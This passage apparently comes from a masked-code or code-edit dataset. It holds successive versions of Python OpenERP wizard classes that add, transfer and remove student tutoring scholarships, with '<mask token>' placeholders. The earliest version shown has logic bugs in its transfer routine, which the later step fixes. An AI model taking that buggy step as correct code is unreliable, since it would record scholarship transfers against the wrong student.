('disciplina_id', '=', disciplina_id_de), ('tutor', '=', tutor_de)]\"\n ), 'curso_id_para': fields.many2one('ud.curso', u'Curso', required=\n True, domain=\"[('is_active', '=', True)]\"), 'disciplina_id_para':\n fields.many2one('ud.monitoria.disciplina', u'Disciplinas', required\n =True, domain=\n \"[('semestre_id', '=', semestre_id), ('curso_id', '=', curso_id_para), ('is_active', '=', True)]\"\n ), 'tutor_para': fields.boolean(u'Tutor?'), 'status_para': fields.\n selection(_STATES, u'Status', required=True),\n 'doc_discente_id_para': fields.many2one(\n 'ud.monitoria.documentos.discente', u'Discente', required=True,\n domain=\n \"[('is_active', '=', True), ('state', '=', status_para), ('disciplina_id', '=', disciplina_id_para), ('tutor', '=', tutor_para)]\"\n ), 'banco_id': fields.many2one('ud.banco', u'Banco', ondelete=\n 'restrict'), 'agencia': fields.char(u'Agência', size=4, help=\n u'Número da Agência'), 'dv_agencia': fields.char(u'DV Agência',\n size=2, help=u'Dígito verificador da Agência'), 'conta': fields.\n char(u'Conta', size=10, help=u'Número da Conta'), 'dv_conta':\n fields.char(u'DV Conta', size=1, help=\n u'Dígito verificador da Conta'), 'operacao': fields.char(\n u'Operação', size=3, help=u'Tipo de conta'), 'agencia_v': fields.\n related('banco_id', 'agencia', type='boolean', invisible=True,\n readonly=True), 'dv_agencia_v': fields.related('banco_id',\n 'dv_agencia', type='boolean', invisible=True, readonly=True),\n 'conta_v': fields.related('banco_id', 'conta', type='boolean',\n invisible=True, readonly=True), 'dv_conta_v': fields.related(\n 'banco_id', 'dv_conta', type='boolean', invisible=True, readonly=\n True), 'operacao_v': fields.related('banco_id', 'operacao', type=\n 'boolean', invisible=True, readonly=True)}\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(TransferirBolsaWizard, self).default_get(cr, uid,\n fields_list, 
context)\n context = context or {}\n if context.get('active_id', False):\n if context.get('active_model', False) == 'ud.monitoria.registro':\n res['semestre_id'] = context.get('active_id')\n elif context.get('active_model', False\n ) == 'ud.monitoria.documentos.discente':\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(\n cr, uid, context.get('active_id'), context)\n if doc.state != 'bolsista':\n raise osv.except_osv(u'Discente bolsista',\n u'O discente já é bolsista')\n elif not doc.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'O discente não pode ser classificado como bolsista')\n res['semestre_id'] = doc.disciplina_id.semestre_id.id\n res['curso_id_de'] = doc.disciplina_id.curso_id.id\n res['disciplina_id_de'] = doc.disciplina_id.id\n res['tutor_de'] = doc.tutor\n res['status_de'] = doc.state\n res['doc_discente_id_de'] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, comp, semestre_id, curso_id,\n disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {'value': {('disciplina_id_' + comp): False}}\n reg = self.pool.get('ud.monitoria.registro').read(cr, uid,\n semestre_id, ['processos_seletivos_ids'], context=context, load\n ='_classic_write')\n args = [('curso_id', '=', curso_id), ('processo_seletivo_id', '=',\n reg['processos_seletivos_ids']), ('is_active', '=', True)]\n disc = self.pool.get('ud.monitoria.disciplina').search(cr, uid,\n args, context=context)\n res = {'domain': {('disciplina_id_' + comp): [('id', 'in', disc)]}}\n if not disc:\n res['value'] = {('disciplina_id_' + comp): False}\n return res\n\n def onchange_disciplina(self, cr, uid, ids, comp, disciplina_id,\n doc_discente_id, context=None):\n if disciplina_id and doc_discente_id:\n doc_discente = self.pool.get('ud.monitoria.documentos.discente'\n ).browse(cr, uid, doc_discente_id, context)\n doc_discente_id = (doc_discente_id if doc_discente.\n disciplina_id.id == disciplina_id else False)\n return {'value': {('doc_discente_id_' + comp): doc_discente_id}}\n return {'value': {('doc_discente_id_' + comp): False}}\n\n def onchange_banco(self, cr, uid, ids, banco_id, context=None):\n if banco_id:\n banco = self.pool.get('ud.banco').read(cr, uid, banco_id, [\n 'agencia', 'dv_agencia', 'conta', 'dv_conta', 'operacao'],\n context=context, load='_classic_write')\n vals = {'agencia': False, 'dv_agencia': False, 'conta': False,\n 'dv_conta': False, 'operacao': False}\n vals.update({('%s_v' % dado): banco.get(dado) for dado in banco\n .keys()})\n return {'value': vals}\n return {'value': {'agencia_v': False, 'dv_agencia_v': False,\n 'conta_v': False, 'dv_conta_v': False, 'operacao_v': False,\n 'agencia': False, 'dv_agencia': False, 'conta': False,\n 'dv_conta': False, 'operacao': False}}\n\n def botao_transferir(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get('ud.perfil')\n for transf in self.browse(cr, uid, ids, context):\n matricula = transf.doc_discente_id_para.discente_id.matricula\n for perfil in transf.doc_discente_id_para.discente_id.pessoa_id.papel_ids:\n if perfil.matricula == matricula and perfil.tipo == 'a':\n if perfil.is_bolsista:\n raise osv.except_osv(u'Discente bolsista',\n u'O discente \"{}\" sob matrícula \"{}\" possui bolsa do tipo: \"{}\"'\n .format(transf.doc_discente_id_para.discente_id\n .pessoa_id.name, matricula, TIPOS_BOLSA[perfil.\n tipo_bolsa]))\n break\n if not perfil:\n raise osv.except_osv(u'Perfil excluído', \n u'O perfil do discente para a matrícula \"%s\" não existe ou foi excluído'\n % matricula or 
'')\n matricula = transf.doc_discente_id_de.discente_id.matricula\n for perfil_de in transf.doc_discente_id_de.discente_id.pessoa_id.papel_ids:\n if perfil.matricula == matricula and perfil.tipo == 'a':\n break\n responsavel = self.pool.get('ud.employee').search(cr,\n SUPERUSER_ID, [('user_id', '=', uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(u'Registro Inexistente',\n u'Não é possível realizar essa alteração enquanto seu login não estiver vinculado ao núcleo'\n )\n if len(responsavel) > 1:\n raise osv.except_osv(u'Multiplos vínculos',\n u'Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo'\n )\n valor = perfil_de.valor_bolsa\n perfil_model.write(cr, SUPERUSER_ID, perfil.id, {'is_bolsista':\n True, 'tipo_bolsa': 'm', 'valor_bolsa': valor})\n perfil_model.write(cr, SUPERUSER_ID, perfil_de.id, {\n 'is_bolsista': False, 'tipo_bolsa': False, 'valor_bolsa': \n False})\n transf.doc_discente_id_de.write({'state': 'n_bolsista'})\n transf.doc_discente_id_para.write({'state': 'bolsista',\n 'is_active': True})\n get_banco(self, cr, transf, transf.doc_discente_id_para.\n discente_id.pessoa_id.id, context)\n evento = {'responsavel_id': responsavel[0], 'name':\n u'Transferência de bolsa', 'envolvidos_ids': [(4, transf.\n doc_discente_id_de.discente_id.pessoa_id.id), (4, transf.\n doc_discente_id_para.discente_id.pessoa_id.id)],\n 'descricao': \n u'Transferência de bolsa no valor de R$ %(valor)s do discente %(discente_de)s sob matrícula %(matricula_de)s para o(a) discente \"%(discente_para)s\" sob matrícula\"%(matricula_para)s\".'\n % {'valor': valor, 'discente_de': transf.\n doc_discente_id_de.discente_id.pessoa_id.name.upper(),\n 'matricula_de': perfil_de.matricula, 'discente_para':\n transf.doc_discente_id_de.discente_id.pessoa_id.name.upper(\n ), 'matricula_para': perfil_de.matricula}}\n transf.semestre_id.write({'eventos_ids': [(0, 0, evento)]})\n return True\n\n\nclass RemoverBolsaWizard(osv.TransientModel):\n _name = 'ud.monitoria.bolsa.remover.wizard'\n _description = u'Remoção de bolsa de discente'\n _columns = {'semestre_id': fields.many2one('ud.monitoria.registro',\n u'Semestre', required=True, readonly=True), 'curso_id': fields.\n many2one('ud.curso', u'Curso', required=True, domain=\n \"[('is_active', '=', True)]\"), 'disciplina_id': fields.many2one(\n 'ud.monitoria.disciplina', u'Disciplinas', required=True, domain=\n \"[('id', '=', False)]\"), 'tutor': fields.boolean(u'Tutor?'),\n 'doc_discente_id': fields.many2one(\n 'ud.monitoria.documentos.discente', u'Discente', required=True,\n domain=\n \"[('disciplina_id', '=', disciplina_id), ('tutor', '=', tutor), ('is_active', '=', True), ('state', '=', 'bolsista')]\"\n )}\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(RemoverBolsaWizard, self).default_get(cr, uid,\n fields_list, context)\n context = context or {}\n if context.get('active_id', False):\n if context.get('active_model', False) == 'ud.monitoria.registro':\n res['semestre_id'] = context.get('active_id')\n elif context.get('active_model', False\n ) == 'ud.monitoria.documentos.discente':\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(\n cr, uid, context.get('active_id'), context)\n if doc.state != 'bolsista':\n raise osv.except_osv(u'Discente não bolsista',\n u'O discente não é bolsista')\n elif not doc.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'Não é possível alterar o status de discentes inativos'\n )\n res['semestre_id'] = 
doc.disciplina_id.semestre_id.id\n res['curso_id'] = doc.disciplina_id.curso_id.id\n res['disciplina_id'] = doc.disciplina_id.id\n res['tutor'] = doc.tutor\n res['doc_discente_id'] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, semestre_id, curso_id,\n disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {'value': {'disciplina_id': False}}\n reg = self.pool.get('ud.monitoria.registro').read(cr, uid,\n semestre_id, ['processos_seletivos_ids'], context=context, load\n ='_classic_write')\n args = [('curso_id', '=', curso_id), ('processo_seletivo_id', '=',\n reg['processos_seletivos_ids']), ('is_active', '=', True)]\n disc = self.pool.get('ud.monitoria.disciplina').search(cr, uid,\n args, context=context)\n res = {'domain': {'disciplina_id': [('id', 'in', disc)]}}\n if not disc:\n res['value'] = {'disciplina_id': False}\n return res\n\n def onchange_disciplina(self, cr, uid, ids, disciplina_id,\n doc_discente_id, context=None):\n if disciplina_id and doc_discente_id:\n doc_discente = self.pool.get('ud.monitoria.documentos.discente'\n ).browse(cr, uid, doc_discente_id, context)\n doc_discente_id = (doc_discente_id if doc_discente.\n disciplina_id.id == disciplina_id else False)\n return {'value': {'doc_discente_id': doc_discente_id}}\n return {'value': {'doc_discente_id': False}}\n\n def botao_remover(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get('ud.perfil')\n pessoa_model = self.pool.get('ud.employee')\n for rem in self.browse(cr, uid, ids, context):\n responsavel = pessoa_model.search(cr, SUPERUSER_ID, [('user_id',\n '=', uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(u'Registro Inexistente',\n u'Não é possível realizar essa alteração enquanto seu login não estiver vinculado ao núcleo'\n )\n if len(responsavel) > 1:\n raise osv.except_osv(u'Multiplos vínculos',\n u'Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo'\n )\n perfil = rem.doc_discente_id.inscricao_id.perfil_id\n perfil_model.write(cr, SUPERUSER_ID, perfil.id, {'is_bolsista':\n False, 'tipo_bolsa': False, 'valor_bolsa': False})\n rem.doc_discente_id.write({'state': 'n_bolsista'})\n evento = {'responsavel_id': responsavel[0], 'name': \n u'Remoção de bolsa: \"%s\"' % rem.doc_discente_id.discente_id\n .name, 'envolvidos_ids': [(4, rem.doc_discente_id.\n discente_id.id)], 'descricao': \n u'A bolsa do discente \"%s\" sob matrícula \"%s\" foi removida.' %\n (rem.doc_discente_id.discente_id.name.upper(), perfil.\n matricula)}\n rem.semestre_id.write({'eventos_ids': [(0, 0, evento)]})\n return True\n",
"step-2": "<mask token>\n\n\nclass AdicionarBolsaWizard(osv.TransientModel):\n <mask token>\n <mask token>\n <mask token>\n\n def _bolsas(self, cr, uid, ids, campos, args, context=None):\n oferta_model = self.pool.get('ud.monitoria.oferta.disciplina')\n res = {}\n for add in self.browse(cr, uid, ids, context):\n res[add.id] = add.disciplina_id.bolsas\n return res\n <mask token>\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(AdicionarBolsaWizard, self).default_get(cr, uid,\n fields_list, context)\n res['status'] = 'n_bolsista'\n res['valor_bolsa'] = 400.0\n context = context or {}\n if context.get('active_id', False):\n if context.get('active_model', False) == 'ud.monitoria.registro':\n res['semestre_id'] = context.get('active_id')\n elif context.get('active_model', False\n ) == 'ud.monitoria.documentos.discente':\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(\n cr, uid, context.get('active_id'), context)\n if doc.state == 'bolsista':\n raise osv.except_osv(u'Discente bolsista',\n u'O discente já é bolsista')\n elif not doc.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'Não é possível alterar o status de discentes inativos'\n )\n res['semestre_id'] = doc.disciplina_id.semestre_id.id\n res['curso_id'] = doc.disciplina_id.curso_id.id\n res['disciplina_id'] = doc.disciplina_id.id\n res['tutor'] = doc.tutor\n res['status'] = doc.state\n res['doc_discente_id'] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, semestre_id, curso_id,\n disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {'value': {'disciplina_id': False}}\n reg = self.pool.get('ud.monitoria.registro').read(cr, uid,\n semestre_id, ['processos_seletivos_ids'], context=context, load\n ='_classic_write')\n args = [('curso_id', '=', curso_id), ('processo_seletivo_id', '=',\n reg['processos_seletivos_ids']), ('is_active', '=', True)]\n disc = self.pool.get('ud.monitoria.disciplina').search(cr, uid,\n args, context=context)\n res = {'domain': {'disciplina_id': [('id', 'in', disc)]}}\n if not disc:\n res['value'] = {'disciplina_id': False}\n return res\n\n def onchange_disciplina(self, cr, uid, ids, disciplina_id,\n doc_discente_id, context=None):\n if disciplina_id:\n if doc_discente_id:\n doc_discente = self.pool.get('ud.monitoria.documentos.discente'\n ).browse(cr, uid, doc_discente_id, context)\n doc_discente_id = (doc_discente_id if doc_discente.\n disciplina_id.id == disciplina_id else False)\n disciplina_id = self.pool.get('ud.monitoria.disciplina').browse(cr,\n uid, disciplina_id, context)\n return {'value': {'doc_discente_id': doc_discente_id, 'bolsas':\n disciplina_id.bolsas}}\n return {'value': {'doc_discente_id': False, 'bolsas': 0}}\n\n def onchange_doc_discente(self, cr, uid, ids, doc_discente_id,\n dados_bancarios_id, context=None):\n if doc_discente_id:\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(cr,\n uid, doc_discente_id, context)\n if not dados_bancarios_id:\n dados_bancarios_id = getattr(doc.dados_bancarios_id, 'id', \n False)\n return {'value': {'dados_bancarios_id': dados_bancarios_id},\n 'domain': {'dados_bancarios_id': [('ud_conta_id', '=', doc.\n discente_id.id)]}}\n return {'value': {'dados_bancarios_id': False}, 'domain': {\n 'dados_bancarios_id': [('id', '=', False)]}}\n <mask token>\n\n def botao_adicionar(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get('ud.perfil')\n for add in self.browse(cr, uid, ids, context):\n if add.bolsas == 0:\n raise 
osv.except_osv(u'Bolsas Insuficientes',\n u'Não há bolsas disponíveis para essa disciplina')\n elif not add.doc_discente_id.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'O discente não pode ser classificado como bolsista')\n if add.doc_discente_id.inscricao_id.perfil_id.is_bolsista:\n raise osv.except_osv(u'Discente bolsista',\n u'O discente \"{}\" sob matrícula \"{}\" possui bolsa do tipo: \"{}\"'\n .format(add.doc_discente_id.discente_id.name, add.\n doc_discente_id.inscricao_id.perfil_id.matricula,\n TIPOS_BOLSA[add.doc_discente_id.inscricao_id.perfil_id.\n tipo_bolsa]))\n responsavel = self.pool.get('ud.employee').search(cr,\n SUPERUSER_ID, [('user_id', '=', uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(u'Registro Inexistente',\n u'Não é possível realizar essa alteração enquanto seu login não estiver vinculado a uma pessoa no núcleo'\n )\n if len(responsavel) > 1:\n raise osv.except_osv(u'Multiplos vínculos',\n u'Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo'\n )\n perfil_model.write(cr, SUPERUSER_ID, add.doc_discente_id.\n inscricao_id.perfil_id.id, {'is_bolsista': True,\n 'tipo_bolsa': 'm', 'valor_bolsa': ('%.2f' % add.valor_bolsa\n ).replace('.', ',')})\n if not add.dados_bancarios_id:\n dados_bancarios = get_banco(self, cr, add, add.\n doc_discente_id.discente_id.id, context)\n else:\n dados_bancarios = add.dados_bancarios_id.id\n add.doc_discente_id.write({'state': 'bolsista',\n 'dados_bancarios_id': dados_bancarios})\n evento = {'responsavel_id': responsavel[0], 'name': \n u'Adição de bolsa: \"%s\"' % add.doc_discente_id.discente_id.\n name, 'envolvidos_ids': [(4, add.doc_discente_id.\n discente_id.id)], 'descricao': \n u'Uma bolsa de R$ %s foi vinculada para o(a) discente \"%s\" sob matrícula \"%s\".'\n % (('%.2f' % add.valor_bolsa).replace('.', ','), add.\n doc_discente_id.discente_id.name.upper(), add.\n doc_discente_id.inscricao_id.perfil_id.matricula)}\n add.semestre_id.write({'eventos_ids': [(0, 0, evento)]})\n return True\n\n\nclass TransferirBolsaWizard(osv.TransientModel):\n _name = 'ud.monitoria.bolsa.transferir.wizard'\n _description = u'Transferência de bolsa de monitoria (UD)'\n _STATES = [('n_bolsista', u'Não Bolsista'), ('reserva',\n u'Cadastro de Reserva')]\n _columns = {'semestre_id': fields.many2one('ud.monitoria.registro',\n u'Semestre', required=True, readonly=True), 'curso_id_de': fields.\n many2one('ud.curso', u'Curso', required=True, domain=\n \"[('is_active', '=', True)]\"), 'disciplina_id_de': fields.many2one(\n 'ud.monitoria.disciplina', u'Disciplinas', required=True, domain=\n \"[('id', '=', False)]\"), 'tutor_de': fields.boolean(u'Tutor?'),\n 'doc_discente_id_de': fields.many2one(\n 'ud.monitoria.documentos.discente', u'Discente', required=True,\n domain=\n \"[('is_active', '=', True), ('state', '=', 'bolsista'), ('disciplina_id', '=', disciplina_id_de), ('tutor', '=', tutor_de)]\"\n ), 'curso_id_para': fields.many2one('ud.curso', u'Curso', required=\n True, domain=\"[('is_active', '=', True)]\"), 'disciplina_id_para':\n fields.many2one('ud.monitoria.disciplina', u'Disciplinas', required\n =True, domain=\n \"[('semestre_id', '=', semestre_id), ('curso_id', '=', curso_id_para), ('is_active', '=', True)]\"\n ), 'tutor_para': fields.boolean(u'Tutor?'), 'status_para': fields.\n selection(_STATES, u'Status', required=True),\n 'doc_discente_id_para': fields.many2one(\n 'ud.monitoria.documentos.discente', u'Discente', required=True,\n domain=\n \"[('is_active', '=', 
True), ('state', '=', status_para), ('disciplina_id', '=', disciplina_id_para), ('tutor', '=', tutor_para)]\"\n ), 'banco_id': fields.many2one('ud.banco', u'Banco', ondelete=\n 'restrict'), 'agencia': fields.char(u'Agência', size=4, help=\n u'Número da Agência'), 'dv_agencia': fields.char(u'DV Agência',\n size=2, help=u'Dígito verificador da Agência'), 'conta': fields.\n char(u'Conta', size=10, help=u'Número da Conta'), 'dv_conta':\n fields.char(u'DV Conta', size=1, help=\n u'Dígito verificador da Conta'), 'operacao': fields.char(\n u'Operação', size=3, help=u'Tipo de conta'), 'agencia_v': fields.\n related('banco_id', 'agencia', type='boolean', invisible=True,\n readonly=True), 'dv_agencia_v': fields.related('banco_id',\n 'dv_agencia', type='boolean', invisible=True, readonly=True),\n 'conta_v': fields.related('banco_id', 'conta', type='boolean',\n invisible=True, readonly=True), 'dv_conta_v': fields.related(\n 'banco_id', 'dv_conta', type='boolean', invisible=True, readonly=\n True), 'operacao_v': fields.related('banco_id', 'operacao', type=\n 'boolean', invisible=True, readonly=True)}\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(TransferirBolsaWizard, self).default_get(cr, uid,\n fields_list, context)\n context = context or {}\n if context.get('active_id', False):\n if context.get('active_model', False) == 'ud.monitoria.registro':\n res['semestre_id'] = context.get('active_id')\n elif context.get('active_model', False\n ) == 'ud.monitoria.documentos.discente':\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(\n cr, uid, context.get('active_id'), context)\n if doc.state != 'bolsista':\n raise osv.except_osv(u'Discente bolsista',\n u'O discente já é bolsista')\n elif not doc.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'O discente não pode ser classificado como bolsista')\n res['semestre_id'] = doc.disciplina_id.semestre_id.id\n res['curso_id_de'] = doc.disciplina_id.curso_id.id\n res['disciplina_id_de'] = doc.disciplina_id.id\n res['tutor_de'] = doc.tutor\n res['status_de'] = doc.state\n res['doc_discente_id_de'] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, comp, semestre_id, curso_id,\n disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {'value': {('disciplina_id_' + comp): False}}\n reg = self.pool.get('ud.monitoria.registro').read(cr, uid,\n semestre_id, ['processos_seletivos_ids'], context=context, load\n ='_classic_write')\n args = [('curso_id', '=', curso_id), ('processo_seletivo_id', '=',\n reg['processos_seletivos_ids']), ('is_active', '=', True)]\n disc = self.pool.get('ud.monitoria.disciplina').search(cr, uid,\n args, context=context)\n res = {'domain': {('disciplina_id_' + comp): [('id', 'in', disc)]}}\n if not disc:\n res['value'] = {('disciplina_id_' + comp): False}\n return res\n\n def onchange_disciplina(self, cr, uid, ids, comp, disciplina_id,\n doc_discente_id, context=None):\n if disciplina_id and doc_discente_id:\n doc_discente = self.pool.get('ud.monitoria.documentos.discente'\n ).browse(cr, uid, doc_discente_id, context)\n doc_discente_id = (doc_discente_id if doc_discente.\n disciplina_id.id == disciplina_id else False)\n return {'value': {('doc_discente_id_' + comp): doc_discente_id}}\n return {'value': {('doc_discente_id_' + comp): False}}\n\n def onchange_banco(self, cr, uid, ids, banco_id, context=None):\n if banco_id:\n banco = self.pool.get('ud.banco').read(cr, uid, banco_id, [\n 'agencia', 'dv_agencia', 'conta', 'dv_conta', 'operacao'],\n 
context=context, load='_classic_write')\n            vals = {'agencia': False, 'dv_agencia': False, 'conta': False,\n                'dv_conta': False, 'operacao': False}\n            vals.update({('%s_v' % dado): banco.get(dado) for dado in banco\n                .keys()})\n            return {'value': vals}\n        return {'value': {'agencia_v': False, 'dv_agencia_v': False,\n            'conta_v': False, 'dv_conta_v': False, 'operacao_v': False,\n            'agencia': False, 'dv_agencia': False, 'conta': False,\n            'dv_conta': False, 'operacao': False}}\n\n    def botao_transferir(self, cr, uid, ids, context=None):\n        perfil_model = self.pool.get('ud.perfil')\n        for transf in self.browse(cr, uid, ids, context):\n            matricula = transf.doc_discente_id_para.discente_id.matricula\n            for perfil in transf.doc_discente_id_para.discente_id.pessoa_id.papel_ids:\n                if perfil.matricula == matricula and perfil.tipo == 'a':\n                    if perfil.is_bolsista:\n                        raise osv.except_osv(u'Discente bolsista',\n                            u'O discente \"{}\" sob matrícula \"{}\" possui bolsa do tipo: \"{}\"'\n                            .format(transf.doc_discente_id_para.discente_id\n                            .pessoa_id.name, matricula, TIPOS_BOLSA[perfil.\n                            tipo_bolsa]))\n                    break\n            if not perfil:\n                raise osv.except_osv(u'Perfil excluído', \n                    u'O perfil do discente para a matrícula \"%s\" não existe ou foi excluído'\n                    % matricula or '')\n            matricula = transf.doc_discente_id_de.discente_id.matricula\n            for perfil_de in transf.doc_discente_id_de.discente_id.pessoa_id.papel_ids:\n                if perfil_de.matricula == matricula and perfil_de.tipo == 'a':\n                    break\n            responsavel = self.pool.get('ud.employee').search(cr,\n                SUPERUSER_ID, [('user_id', '=', uid)], limit=2)\n            if not responsavel:\n                raise osv.except_osv(u'Registro Inexistente',\n                    u'Não é possível realizar essa alteração enquanto seu login não estiver vinculado ao núcleo'\n                    )\n            if len(responsavel) > 1:\n                raise osv.except_osv(u'Multiplos vínculos',\n                    u'Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo'\n                    )\n            valor = perfil_de.valor_bolsa\n            perfil_model.write(cr, SUPERUSER_ID, perfil.id, {'is_bolsista':\n                True, 'tipo_bolsa': 'm', 'valor_bolsa': valor})\n            perfil_model.write(cr, SUPERUSER_ID, perfil_de.id, {\n                'is_bolsista': False, 'tipo_bolsa': False, 'valor_bolsa': \n                False})\n            transf.doc_discente_id_de.write({'state': 'n_bolsista'})\n            transf.doc_discente_id_para.write({'state': 'bolsista',\n                'is_active': True})\n            get_banco(self, cr, transf, transf.doc_discente_id_para.\n                discente_id.pessoa_id.id, context)\n            evento = {'responsavel_id': responsavel[0], 'name':\n                u'Transferência de bolsa', 'envolvidos_ids': [(4, transf.\n                doc_discente_id_de.discente_id.pessoa_id.id), (4, transf.\n                doc_discente_id_para.discente_id.pessoa_id.id)],\n                'descricao': \n                u'Transferência de bolsa no valor de R$ %(valor)s do discente %(discente_de)s sob matrícula %(matricula_de)s para o(a) discente \"%(discente_para)s\" sob matrícula \"%(matricula_para)s\".'\n                % {'valor': valor, 'discente_de': transf.\n                doc_discente_id_de.discente_id.pessoa_id.name.upper(),\n                'matricula_de': perfil_de.matricula, 'discente_para':\n                transf.doc_discente_id_para.discente_id.pessoa_id.name.upper(\n                ), 'matricula_para': perfil.matricula}}\n            transf.semestre_id.write({'eventos_ids': [(0, 0, evento)]})\n        return True\n\n\nclass RemoverBolsaWizard(osv.TransientModel):\n    _name = 'ud.monitoria.bolsa.remover.wizard'\n    _description = u'Remoção de bolsa de discente'\n    _columns = {'semestre_id': fields.many2one('ud.monitoria.registro',\n        u'Semestre', required=True, readonly=True), 'curso_id': fields.\n        many2one('ud.curso', u'Curso', required=True, domain=\n        \"[('is_active', '=', 
True)]\"), 'disciplina_id': fields.many2one(\n 'ud.monitoria.disciplina', u'Disciplinas', required=True, domain=\n \"[('id', '=', False)]\"), 'tutor': fields.boolean(u'Tutor?'),\n 'doc_discente_id': fields.many2one(\n 'ud.monitoria.documentos.discente', u'Discente', required=True,\n domain=\n \"[('disciplina_id', '=', disciplina_id), ('tutor', '=', tutor), ('is_active', '=', True), ('state', '=', 'bolsista')]\"\n )}\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(RemoverBolsaWizard, self).default_get(cr, uid,\n fields_list, context)\n context = context or {}\n if context.get('active_id', False):\n if context.get('active_model', False) == 'ud.monitoria.registro':\n res['semestre_id'] = context.get('active_id')\n elif context.get('active_model', False\n ) == 'ud.monitoria.documentos.discente':\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(\n cr, uid, context.get('active_id'), context)\n if doc.state != 'bolsista':\n raise osv.except_osv(u'Discente não bolsista',\n u'O discente não é bolsista')\n elif not doc.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'Não é possível alterar o status de discentes inativos'\n )\n res['semestre_id'] = doc.disciplina_id.semestre_id.id\n res['curso_id'] = doc.disciplina_id.curso_id.id\n res['disciplina_id'] = doc.disciplina_id.id\n res['tutor'] = doc.tutor\n res['doc_discente_id'] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, semestre_id, curso_id,\n disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {'value': {'disciplina_id': False}}\n reg = self.pool.get('ud.monitoria.registro').read(cr, uid,\n semestre_id, ['processos_seletivos_ids'], context=context, load\n ='_classic_write')\n args = [('curso_id', '=', curso_id), ('processo_seletivo_id', '=',\n reg['processos_seletivos_ids']), ('is_active', '=', True)]\n disc = self.pool.get('ud.monitoria.disciplina').search(cr, uid,\n args, context=context)\n res = {'domain': {'disciplina_id': [('id', 'in', disc)]}}\n if not disc:\n res['value'] = {'disciplina_id': False}\n return res\n\n def onchange_disciplina(self, cr, uid, ids, disciplina_id,\n doc_discente_id, context=None):\n if disciplina_id and doc_discente_id:\n doc_discente = self.pool.get('ud.monitoria.documentos.discente'\n ).browse(cr, uid, doc_discente_id, context)\n doc_discente_id = (doc_discente_id if doc_discente.\n disciplina_id.id == disciplina_id else False)\n return {'value': {'doc_discente_id': doc_discente_id}}\n return {'value': {'doc_discente_id': False}}\n\n def botao_remover(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get('ud.perfil')\n pessoa_model = self.pool.get('ud.employee')\n for rem in self.browse(cr, uid, ids, context):\n responsavel = pessoa_model.search(cr, SUPERUSER_ID, [('user_id',\n '=', uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(u'Registro Inexistente',\n u'Não é possível realizar essa alteração enquanto seu login não estiver vinculado ao núcleo'\n )\n if len(responsavel) > 1:\n raise osv.except_osv(u'Multiplos vínculos',\n u'Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo'\n )\n perfil = rem.doc_discente_id.inscricao_id.perfil_id\n perfil_model.write(cr, SUPERUSER_ID, perfil.id, {'is_bolsista':\n False, 'tipo_bolsa': False, 'valor_bolsa': False})\n rem.doc_discente_id.write({'state': 'n_bolsista'})\n evento = {'responsavel_id': responsavel[0], 'name': \n u'Remoção de bolsa: \"%s\"' % rem.doc_discente_id.discente_id\n .name, 
'envolvidos_ids': [(4, rem.doc_discente_id.\n discente_id.id)], 'descricao': \n u'A bolsa do discente \"%s\" sob matrícula \"%s\" foi removida.' %\n (rem.doc_discente_id.discente_id.name.upper(), perfil.\n matricula)}\n rem.semestre_id.write({'eventos_ids': [(0, 0, evento)]})\n return True\n",
"step-3": "<mask token>\n\n\nclass AdicionarBolsaWizard(osv.TransientModel):\n _name = 'ud.monitoria.bolsa.adicionar.wizard'\n _description = u'Inclusão de bolsa de monitoria para discente (UD)'\n _STATES = [('n_bolsista', u'Não Bolsista'), ('reserva',\n u'Cadastro de Reserva')]\n\n def _bolsas(self, cr, uid, ids, campos, args, context=None):\n oferta_model = self.pool.get('ud.monitoria.oferta.disciplina')\n res = {}\n for add in self.browse(cr, uid, ids, context):\n res[add.id] = add.disciplina_id.bolsas\n return res\n _columns = {'semestre_id': fields.many2one('ud.monitoria.registro',\n u'Semestre', required=True, readonly=True), 'curso_id': fields.\n many2one('ud.curso', u'Curso', required=True, domain=\n \"[('is_active', '=', True)]\"), 'disciplina_id': fields.many2one(\n 'ud.monitoria.disciplina', u'Disciplinas', required=True, domain=\n \"[('semestre_id', '=', semestre_id), ('curso_id', '=', curso_id), ('is_active', '=', True)]\"\n ), 'bolsas': fields.function(_bolsas, type='integer', string=\n u'Bolsas disponíveis', help=\n u'Número de bolsas disponíveis para a disciplina'), 'valor_bolsa':\n fields.float(u'Bolsa (R$)'), 'tutor': fields.boolean(u'Tutor?'),\n 'status': fields.selection(_STATES, u'Status', required=True),\n 'doc_discente_id': 